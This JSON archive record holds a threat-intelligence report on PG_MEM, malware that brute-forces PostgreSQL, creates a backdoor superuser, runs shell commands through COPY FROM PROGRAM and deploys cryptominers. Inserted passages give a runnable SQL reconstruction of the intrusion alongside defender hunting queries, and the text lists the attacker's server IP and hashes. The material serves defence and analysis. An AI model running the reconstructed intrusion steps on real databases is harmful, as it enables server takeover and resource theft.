{
	"id": "8fce27bd-be7c-4d6f-a38f-020efcf9c896",
	"created_at": "2026-04-06T00:13:36.691811Z",
	"updated_at": "2026-04-10T03:34:59.833154Z",
	"deleted_at": null,
	"sha1_hash": "b9920be1ae93cbe482c9fafc95c96479f3881f05",
	"title": "PG_MEM: A Malware Hidden in the Postgres Processes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4940331,
	"plain_text": "PG_MEM: A Malware Hidden in the Postgres Processes\r\nBy Assaf Morag\r\nPublished: 2024-08-19 · Archived: 2026-04-05 14:46:33 UTC\r\nAqua Nautilus researchers have uncovered PG_MEM, a new PostgreSQL malware, that brute forces its way into\r\nPostgreSQL databases, delivers payloads to hide its operations, and mines cryptocurrency. In this blog, we explain\r\nthis attack, the techniques used by the threat actor, and how to detect and protect your environments.\r\nAbout Postgres\r\nPostgreSQL, commonly known as Postgres, is a powerful, open source relational database management system\r\n(RDBMS) known for its robustness and flexibility. Brute force attacks on Postgres involve repeatedly attempting\r\nto guess the database credentials until access is gained, exploiting weak passwords. Once accessed, attackers can\r\nleverage the COPY … FROM PROGRAM SQL command to execute arbitrary shell commands on the host,\r\nallowing them to perform malicious activities such as data theft or deploying malware.\r\nAttack flow\r\nWe observed a successful brute force attack on a PostgreSQL database, which led to the exploitation of a feature\r\nthat allows command execution. Next, the threat actor created a superuser role in the database and dropped two\r\nfiles to disk. These files are used to eliminate competition, evade detection, gain persistence, and ultimately\r\ndeploy cryptocurrency miners. While this is the main impact, at this point the attacker can also run commands,\r\nview data, and control the server.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 1 of 14\n\nFigure 1: Attack flow of PG_MEM\r\nBrute Force Attack\r\nThe first stage is a simple brute force attack. 
We observe several login attempts to the PostgreSQL database being refused until the brute force attack successfully guesses the honeypot’s username and password (which were intentionally set to be easy to guess).\r\nFigure 2: Screenshot from Wireshark, illustrating a failed brute force attempt against Postgres\r\nGaining Persistence\r\nAfter the threat actor successfully guessed the username and password, the attack sequence commenced. The following set of SQL commands was executed:\r\nFigure 3: The threat actor’s command to create a new superuser (backdoor)\r\nFirst, the threat actor creates a new role with login capability and superuser privileges. Next, the threat actor inspects the account through which access was initially gained: SELECT CURRENT_USER returns the name of the database user for the session, and the following command lists the roles and indicates which of them have superuser privileges. Then the compromised postgres role is stripped of superuser privileges. This restricts the privileges of other threat actors who might still gain access to the system via the same weak password, leaving the attacker’s new role as the working superuser.\r\nInitial System Discovery\r\nNext, the threat actor gathers information about the system.\r\nFigure 4: Compilation of commands aimed at discovering the system\r\nThe first command displays the path to the pg_hba.conf file, PostgreSQL’s client authentication configuration file. The second command retrieves the version of the PostgreSQL server. Next, the threat actor creates a temporary table to hold command output and file contents before they are written to disk. Using COPY … FROM PROGRAM, which runs a shell command on the host as the database server’s operating system user, the threat actor executes uname and whoami and stores the output in the temporary table. 
Each time, the temporary table is emptied with TRUNCATE, which discards all rows at once and is faster than DELETE in PostgreSQL.\r\nPayload Delivery\r\nIn total, two files are downloaded from the threat actor’s remote server. In Figure 5 below, you can observe the first block of commands, aimed at delivering the first payload.\r\nIn general, the threat actor uses a temporary table to stage code and data. Before and after each command, the threat actor uses TRUNCATE to clear the temporary table (pg_temp.log_tmp) and then uses COPY … FROM PROGRAM to execute various shell commands, capturing their output into the table.\r\nFigure 5: Delivery of PG_Core malware\r\nThe threat actor uses the following command to open a TCP connection to the IP address 128.199.77.96 on port 3232 and fetch dqQkiJwLFH, which is then stored as the file pg_core.\r\nFigure 6: Download of PG_Core from the threat actor’s server\r\nNext, chmod is used to make pg_core executable and its MD5 hash is calculated. pg_core is later executed with a specific argument: a base64-encoded string which, once decoded, reveals a cryptomining-related message in which h probably stands for hash and p for the assigned worker.\r\nFigure 7: Execution command for PG_Core, decoded from base64\r\nThe executable’s bytes are also staged in the temporary table and then written to the path /var/lib/postgresql/data/log-tmp. The code is also designed to retrieve the process ID of the current PostgreSQL backend process. 
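The following SQL is an added reconstruction of the steps described above (Figures 3 to 7 are not reproduced in this text); it is neither the threat actor’s verbatim commands nor Aqua’s code. The role name pg_backdoor, its password and the stand-in file content are assumptions, while the temporary table name pg_temp.log_tmp and the output path /var/lib/postgresql/data/log-tmp are the ones named in the report. Run it only in a disposable instance, connected as a superuser:

```sql
-- Added reconstruction of the PG_MEM intrusion steps, not the actor's verbatim
-- SQL (the figures are not reproduced here). Assumptions: role pg_backdoor and
-- its password, the stand-in payload text. Requires a superuser session:
-- COPY ... FROM PROGRAM and COPY ... TO a server file are restricted to
-- superusers and members of pg_execute_server_program / pg_write_server_files.

-- 1. Persistence: a second superuser, then demote the account that let us in,
--    so rivals who guess the same weak password arrive without privileges.
CREATE ROLE pg_backdoor WITH LOGIN SUPERUSER PASSWORD 'assumed-password';
SELECT current_user;                                -- the brute-forced account
SELECT rolname, rolsuper FROM pg_roles ORDER BY 1;  -- who else is superuser
ALTER ROLE postgres NOSUPERUSER;

-- 2. Discovery: client-auth config location and server version.
SHOW hba_file;
SELECT version();

-- 3. Staging area. A pg_temp table disappears with the session, so no
--    permanent object is left for a DBA to notice.
CREATE TEMP TABLE log_tmp (t text);

-- 4. Host command execution: stdout of the program becomes rows of the table,
--    one line per row, run as the PostgreSQL server's OS user.
TRUNCATE pg_temp.log_tmp;
COPY pg_temp.log_tmp FROM PROGRAM 'uname -a';
SELECT t FROM pg_temp.log_tmp;
TRUNCATE pg_temp.log_tmp;
COPY pg_temp.log_tmp FROM PROGRAM 'whoami';
SELECT t FROM pg_temp.log_tmp;

-- 5. Dropping a file: the campaign staged the fetched payload in the table and
--    wrote it out under the data directory. Harmless text stands in here;
--    the path is the one named in the report (adjust to your data directory).
TRUNCATE pg_temp.log_tmp;
INSERT INTO pg_temp.log_tmp VALUES ('stand-in for payload bytes');
COPY pg_temp.log_tmp TO '/var/lib/postgresql/data/log-tmp';
TRUNCATE pg_temp.log_tmp;
COPY pg_temp.log_tmp FROM PROGRAM
  'chmod +x /var/lib/postgresql/data/log-tmp; md5sum /var/lib/postgresql/data/log-tmp';
SELECT t FROM pg_temp.log_tmp;                      -- MD5 of the dropped file

-- 6. Same clean-up as the actor: nothing remains in the session's temp table.
TRUNCATE pg_temp.log_tmp;
```

Two points worth noting. COPY’s text format cannot carry arbitrary bytes, so a real ELF has to be staged through an encoding (base64, for instance) and decoded on the host; the report does not show which encoding the actor used. And every command runs as the operating system user that owns the PostgreSQL server process, which is why the whoami output and the ownership of the dropped file both point at the database account rather than at the attacker.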
Retrieving the backend’s PID can be useful for debugging or monitoring purposes.\r\nIn addition, all cron jobs for the current user are removed and various processes are killed, including kdevtmpfsi, pg_mem, kinsing, postgres-kernel and others. The threat actor is terminating earlier infections, both their own and those of others, which shows some intelligence on competitors.\r\nFigure 8: The command given to kill competing malware\r\nLastly, the threat actor deletes files such as the pg_core binary and malware logs such as ps_stat_good to evade defenses (such as volume-based scanners).\r\nThe threat actor also deploys a second payload, named pg_mem. This is a dropper that contains an XMR cryptominer and is responsible for optimizing the mining operation. Below you can see the operations via Postgres, which closely mirror the delivery of the first payload.\r\nFigure 9: Compilation of commands to deliver PG_mem\r\nAs can be seen, the threat actor opens a TCP connection to the IP address 128.199.77.96 on port 3232 and fetches KfLhjeXuQc, which is then stored as the file pg_mem.\r\nAfter the ELF file pg_mem is executed, it stores a third ELF binary named memory. 
This file is an XMRIG cryptominer, which is used to mine cryptocurrency.\r\nFigure 10: The configuration of the XMRIG\r\nFigure 11: Mining Cryptocurrency data\r\nAs can be seen in Figure 12 below, the cryptominer memory is executed with the argument deleted; in addition, the threat actor creates a cron job that executes pg_mem and inserts an empty value into the pg_hba configuration file.\r\nFigure 12: A cron job aimed at creating persistence on the Postgres server\r\nThree files are dropped to disk under the path /var/lib/postgresql/data/:\r\nmemory (MD5: 3f3eae22dd67e741e87a18a2383900a5), detected in VirusTotal as a cryptominer.\r\npg_core (MD5: aacf2146cac9946592f069ef6d94635b), with various detections such as potentially unwanted, cryptominer, trojan, etc.\r\npg_mem (MD5: f705c3bc4e98585357c03feac623356c), with various detections such as potentially unwanted, cryptominer, trojan, etc.\r\nAll three ELF binaries are packed and stripped, and their strings are encrypted.\r\nExposed Postgres Servers in the Wild\r\nShodan, the search engine for Internet-connected devices, was used to identify exposed PostgreSQL databases. By querying Shodan for publicly accessible Postgres instances, we uncovered more than 800,000 internet-connected databases. 
This highlights the critical need to secure database servers against brute force attacks and potential exploitation.\r\nFigure 13: The results in Shodan of searching for internet-facing Postgres servers\r\nMapping the Campaign to the MITRE ATT\u0026CK Framework\r\nOur investigation showed that the attackers used common techniques throughout the campaign. Here we map each stage of the attack to the corresponding MITRE ATT\u0026CK techniques and sub-techniques:\r\nInitial Access\r\nT1190 – Exploit Public-Facing Application: The attacker gains initial access through an internet-facing Postgres database. Note that no software vulnerability is exploited in this campaign: access comes from guessed credentials (see T1110.002 below), followed by abuse of the built-in COPY … FROM PROGRAM feature.\r\nExecution\r\nT1059.004 – Command and Scripting Interpreter: Unix Shell: The attacker executes SQL commands that leverage the PROGRAM feature to run shell commands on the host system.\r\nPersistence\r\nT1136.001 – Create Account: Local Account: The attacker creates a new role with login capability and superuser privileges.\r\nT1098 – Account Manipulation: The attacker manipulates roles and privileges, stripping superuser privileges from the existing postgres user to maintain exclusive access and control.\r\nT1053.003 – Scheduled Task/Job: Cron: The attacker removes all cron jobs to prevent interference from existing scheduled tasks, and adds a cron job to run pg_mem.\r\nPrivilege Escalation\r\nT1068 – Exploitation for Privilege Escalation: The attacker turns database superuser privileges into command execution on the host as the PostgreSQL operating system user.\r\nDefense Evasion\r\nT1070.004 – Indicator Removal on Host: File Deletion: The 
attacker deletes files and logs related to their malware to evade detection.\r\nT1036.004 – Masquerading: Masquerade Task or Service: The attacker names the dropped binaries pg_core and pg_mem and places them in the PostgreSQL data directory so that they pass as legitimate database files.\r\nCredential Access\r\nT1110.002 – Brute Force: Password Guessing: The attacker uses brute force to guess the username and password of the Postgres database.\r\nDiscovery\r\nT1082 – System Information Discovery: The attacker gathers system information using commands such as uname and whoami.\r\nT1057 – Process Discovery: The attacker retrieves the process ID of the PostgreSQL backend process for further analysis or manipulation.\r\nCollection\r\nT1005 – Data from Local System: The attacker collects data by viewing and extracting information from the database and the host system.\r\nCommand and Control\r\nT1105 – Ingress Tool Transfer: The attacker downloads files from a remote server to the compromised system.\r\nT1071.001 – Application Layer Protocol: Web Protocols: The attacker communicates with the remote server (128.199.77.96 on port 3232) to retrieve the payloads.\r\nImpact\r\nT1496 – Resource Hijacking: The primary impact is the deployment of cryptominers, leveraging the system’s resources to mine cryptocurrency.\r\nDetection and remediation with Aqua’s CNAPP\r\nThis campaign exploits internet-facing Postgres databases with weak passwords. Many organizations expose their databases to the internet; weak passwords are the result of misconfiguration and a lack of proper identity controls. This is not a rare issue, and many large organizations suffer from these problems. 
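Before turning to the product screenshots, here is an added set of defender-side queries, not from the original post or from Aqua, that hunt for the role manipulation and COPY … FROM PROGRAM abuse described above and remove the backdoor. They use only built-in catalogs plus the pg_stat_statements extension; the backdoor role name pg_backdoor and the trusted client range 10.0.0.0/8 are assumptions to adapt to your environment:

```sql
-- Added defender-side queries for this report's techniques; not from the
-- original post or from Aqua. Built-in catalogs only, plus pg_stat_statements
-- (needs shared_preload_libraries = 'pg_stat_statements' and CREATE EXTENSION).
-- Assumptions: backdoor role pg_backdoor, trusted client range 10.0.0.0/8.

-- 1. Login-capable roles, superusers first. A brute-forced account plus an
--    unexpected second superuser is the pattern described above.
SELECT rolname, rolsuper, rolcanlogin, rolvaliduntil
FROM pg_roles
WHERE rolcanlogin
ORDER BY rolsuper DESC, rolname;

-- 2. Non-superusers who can still run host programs or write server files:
--    membership in these predefined roles is equivalent to OS access.
SELECT r.rolname AS grantee, m.rolname AS predefined_role
FROM pg_auth_members am
JOIN pg_roles r ON r.oid = am.member
JOIN pg_roles m ON m.oid = am.roleid
WHERE m.rolname IN ('pg_execute_server_program',
                    'pg_write_server_files',
                    'pg_read_server_files');

-- 3. Hunt recorded statements for COPY to/from PROGRAM, COPY to a server
--    file, and role privilege changes. Match on keywords rather than
--    literals, since newer versions may replace constants with $n.
SELECT calls, rows, left(query, 120) AS query
FROM pg_stat_statements
WHERE query ~* 'COPY[[:space:]].*[[:space:]](FROM|TO)[[:space:]]+PROGRAM'
   OR query ~* 'COPY[[:space:]].*[[:space:]]TO[[:space:]]+(''|[$][0-9])'
   OR query ~* '(CREATE|ALTER)[[:space:]]+(ROLE|USER)[[:space:]].*SUPERUSER'
ORDER BY calls DESC;

-- 4. Live client sessions from outside the trusted range, oldest first.
SELECT pid, usename, client_addr, backend_start, state, left(query, 80) AS query
FROM pg_stat_activity
WHERE backend_type = 'client backend'
  AND client_addr IS NOT NULL
  AND NOT client_addr <<= '10.0.0.0/8'
ORDER BY backend_start;

-- 5. Remediation, run as a surviving superuser after the host is cleaned
--    (cron entries and the binaries under the data directory removed):
--    neutralise the backdoor role, kick its sessions, restore the demoted admin.
DO $$
BEGIN
  IF EXISTS (SELECT 1 FROM pg_roles WHERE rolname = 'pg_backdoor') THEN
    ALTER ROLE pg_backdoor NOSUPERUSER NOLOGIN;
    PERFORM pg_terminate_backend(pid)
      FROM pg_stat_activity WHERE usename = 'pg_backdoor';
    DROP ROLE pg_backdoor;
  END IF;
END $$;
ALTER ROLE postgres SUPERUSER;
-- Rotate the guessed password; with password_encryption = 'scram-sha-256'
-- the new hash is stored as SCRAM rather than md5.
SET password_encryption = 'scram-sha-256';
ALTER ROLE postgres WITH PASSWORD 'replace-with-a-long-random-secret';
```

If DROP ROLE fails because the backdoor role owns objects, run REASSIGN OWNED BY and DROP OWNED BY for it first. If the demoted postgres role was the only superuser, the ALTER ROLE restoring it must come from another superuser or from single-user mode. Finally, in pg_hba.conf replace any host line open to 0.0.0.0/0 (whether trust, md5 or scram-sha-256) with entries limited to known client networks, and keep the listener off the public internet altogether; the brute force stage of this campaign only works against servers that accept password logins from anywhere.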
Aqua Security can provide invaluable information about vulnerabilities and misconfigurations, but sometimes employees choose weak passwords or a zero-day vulnerability emerges.\r\nFor this reason, you should adopt a defense-in-depth approach that deploys detection and protection mechanisms at various points of your software development life cycle in the cloud. Runtime detection and response tools such as Aqua’s Runtime Protection are built to detect malicious or suspicious behavior at runtime.\r\nIf one of your running workloads is exposed to this attack, Aqua’s Runtime Protection will show you all the relevant detections. For instance, we highlight two detections below:\r\nFigure 14: Aqua’s Runtime Protection screenshot illustrating a detection of a malicious shell command originating from a database\r\nIn Figure 14 above, you can see a detection of a database program spawning a shell, flagged as suspicious because databases should not be running shell commands. The execution of the shell is also marked as malicious; the detection shows the TCP connection and the fetching of the main payload.\r\nFigure 15: Aqua’s Runtime Protection screenshot illustrating a crypto mining process\r\nSimilarly, in Figure 15 above, you can see a DNS resolution request for a mining pool and the subsequent communication with the cryptomining pool.\r\nAssaf is the Director of Threat Intelligence at Aqua Nautilus. 
He is responsible for acquiring threat intelligence related to the software development life cycle in cloud-native environments, supports the team's data needs, and helps Aqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research has been featured in leading information security publications and journals worldwide, and he has presented at leading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE ATT\u0026CK Container Framework.\r\nAssaf is leading an O’Reilly course focusing on cyber threat intelligence in cloud-native environments. The course covers both theoretical concepts and practical applications, providing valuable insights into the unique challenges and strategies associated with securing cloud-native infrastructures.\r\nSource: https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/"
	],
	"report_names": [
		"pg_mem-a-malware-hidden-in-the-postgres-processes"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434416,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.pdf",
		"text": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.txt",
		"img": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.jpg"
	}
}